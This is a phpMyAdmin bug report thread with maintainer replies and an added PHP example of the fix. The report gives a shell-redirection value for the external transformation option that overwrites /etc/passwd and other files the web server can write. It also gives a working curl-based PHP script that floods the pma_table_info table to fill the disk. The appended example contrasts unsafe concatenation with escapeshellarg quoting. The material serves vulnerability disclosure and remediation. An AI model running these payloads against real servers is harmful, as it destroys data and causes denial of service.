I have discovered 2 security bugs in PMA transformation.
text/plain: external option 1 permits erasing a file
with httpd write access.
Ex: set option[1] to ' 1> /etc/passwd'
The second bug permits a phpmyadmin user to put any number of
fake records in the PMA transformation DB. This fills the
disk and crashes the system.
This is an example script; it is also attached.
#!/usr/bin/php
<?
$user="myUser";
$passwd="myPasswd";
$server="http://www.myserver.com/phpmyadmin";
$login="curl --cookie-jar cookie.txt --data \"pma_username=$user&pma_password=$passwd\" $server/index.php";
exec($login);
$baseurl= $server ."/sql.php?db=phpmyadmin&table=pma_table_info&goto=sql.php&sql_query=";
for ($x = 0; $x < 10; $x++ ){
    $value= md5(time()) . md5(time());
    $query="INSERT INTO `pma_table_info` (`db_name`,`table_name`,`display_field`) VALUES ('$value','$value','$value')";
    $fullurl= $baseurl . urlencode($query);
    $command = "curl --cookie-jar cookie.txt -b cookie.txt '$fullurl'";
    exec($command);
}
?>
Put fake records in PMA.
Logged In: YES
user_id=192186
The first issue is a problem, but not as big, because httpd
usually has a minimal set of permissions.
The second issue won't work: access to the phpmyadmin database is
granted only to the phpMyAdmin control user if you created it with
the script we provide. If you created it some other way, it is
a problem in your MySQL permissions and nothing else.
Logged In: YES
user_id=192186
Transformation issue fixed in cvs.
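
The first issue in this report, shown as an added example that is not part of the thread, not phpMyAdmin's code and not the fix committed to CVS: a user-supplied option string appended verbatim to a shell command line lets the shell act on `1> file`, while quoting each token passes it to the program as plain arguments. The helper names, `/bin/echo` and the temporary file are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helpers, not phpMyAdmin's transformation code.

// Vulnerable pattern: the option string is appended verbatim, so the shell
// interprets metacharacters in it (redirections, pipes, command separators).
function build_cmd_unsafe(string $program, string $options): string
{
    return $program . ' ' . $options;
}

// Hardened pattern: split the options on whitespace and quote every token,
// so "1>" and the path reach the program as literal arguments.
function build_cmd_safe(string $program, string $options): string
{
    $args = preg_split('/\s+/', trim($options), -1, PREG_SPLIT_NO_EMPTY);
    $quoted = array_map('escapeshellarg', $args);
    return escapeshellarg($program) . ' ' . implode(' ', $quoted);
}

// Runs the command and reports whether the target file kept its contents.
function file_survives(string $cmd, string $path, string $expected): bool
{
    exec($cmd);
    return file_get_contents($path) === $expected;
}

// Constructed stand-in for a file the web server user can write to.
$original = "original contents\n";
$victim = tempnam(sys_get_temp_dir(), 'pma');
file_put_contents($victim, $original);

// Same shape as the option value given in the report.
$option = ' 1> ' . $victim;

$safeOk = file_survives(build_cmd_safe('/bin/echo', $option), $victim, $original);
$unsafeOk = file_survives(build_cmd_unsafe('/bin/echo', $option), $victim, $original);

echo 'quoted options, file intact:   ', var_export($safeOk, true), PHP_EOL;
echo 'verbatim options, file intact: ', var_export($unsafeOk, true), PHP_EOL;

unlink($victim);
```

Quoting only stops the shell from interpreting the option string; the external program still receives arguments chosen by the user, so the set of programs that can be run should stay fixed in server-side configuration.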